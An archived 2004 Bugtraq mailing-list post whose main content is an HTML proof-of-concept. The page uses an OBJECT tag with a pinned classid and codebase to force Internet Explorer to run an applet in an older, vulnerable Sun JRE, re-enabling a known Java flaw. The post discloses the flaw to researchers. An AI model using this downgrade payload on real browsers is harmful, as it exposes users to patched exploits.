Java version downgrading proof-of-concept

auto333584_at_hushmail.com
Date: 11/26/04

  • Next message: Nicolas Waisman: "Immunity, Inc Advisor" 
    Date: Fri, 26 Nov 2004 11:41:46 -0800
To: bugtraq@securityfocus.com

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    In reference to this:

    http://www.securityfocus.com/archive/1/382281/2004-11-23/2004-11-
    29/0

    <html>
    <title> Java Version Downgrade proof-of-concept </title>
    <body>
    Demonstration uses the following vulnerability:
    <br>
    http://www.securityfocus.com/bid/8879
    <br>
    Source code for Simple.class:
    <br>
    http://www.securityfocus.com/bid/8879/exploit/
    <p>
    Added this code to Simple.java for debugging purposes:
    <br>
    String javaVersion = System.getProperty("java.version");
    <br>
    addItem("Java version: " + javaVersion);
    <p>
    This proof-of-concept was tested on a Windows system using IE with
    the following Java installations:
    <br>
    Sun JRE 1.3.1_07 (vulnerable to BID 8879)
    <br>
    Sun JRE 1.3.1_13 (not vulnerable to BID 8879)
    <br>
    note: invoking applet normally should run Simple.class in JRE
    1.3.1_13.
    <p>
    <OBJECT classid="clsid:CAFEEFAC-0013-0001-0007-ABCDEFFEDCBA"
    width = "600" height = "100"
    codebase="http://java.sun.com/products/plugin/autodl/jinstall-
    1_3_1_07-windows-i586.cab##Version=1_3_1_07">
    <PARAM NAME="code" VALUE="Simple.class">
    </OBJECT>
    </body>
    </html>

    cheers!

    -----BEGIN PGP SIGNATURE-----
    Note: This signature can be verified at https://www.hushtools.com/verify
    Version: Hush 2.4

    wkUEARECAAYFAkGnht0ACgkQaPog1qyYGULJYgCcCfLJwRDjM3fv5okud87OyhmoookA
    l3lwS0XvR6Zm7jg/ze5wWUkRuDU=
    =EE7n
    -----END PGP SIGNATURE-----

    Concerned about your privacy? Follow this link to get
    secure FREE email: http://www.hushmail.com/?l=2

    Free, ultra-private instant messaging with Hush Messenger
    http://www.hushmail.com/services-messenger?l=434

    Promote security and make money with the Hushmail Affiliate Program:
    http://www.hushmail.com/about-affiliate?l=427

  • Next message: Nicolas Waisman: "Immunity, Inc Advisor"

    Relevant Pages

    • Re: [Full-disclosure] Linuxs unofficial security-through-coverup policy
      ... I couldnt get the source code for Windows, IOS, OSX Intel from ... MS patch as well and determine the vulnerability on their own without ... was a programmer and security expert, ... wouldn't ask such ignorant questions. ...
      (Full-Disclosure)
    • Re: REMOTE FILE INCLUSION ( ALL )
      ... make sure that the variable can be controlled by an attacker. ... Secunia advisory for exactly the same vulnerability, ... since the source code suggests that there is no ... The original source code as quoted from this advisory says: ...
      (Bugtraq)
    • Re: Announce loop-AES-v3.0b file/swap crypto package
      ... I decline it's security implications. ... on the same level as the vulnerability, that you will give away your ... original site is down and source code outdated. ... send the line "unsubscribe linux-kernel" in ...
      (Linux-Kernel)
    • Re: tools to scan source code
      ... i got responsibility to check for vulnerability that may exist. ... the entire source code to find any vulnerability, ... php language. ... Cenzic Hailstorm finds vulnerabilities fast. ...
      (Pen-Test)
    • RE: [Full-disclosure] Different Claims by ZoneLabs on the "BypassingPersonalFirewall (Zone Alar
      ... When was the last time you saw an announcement of a vulnerability ... that affected windows 3.11? ... secure FREE email: http://www.hushmail.com/?l=2 ... ultra-private instant messaging with Hush Messenger ...
      (Full-Disclosure)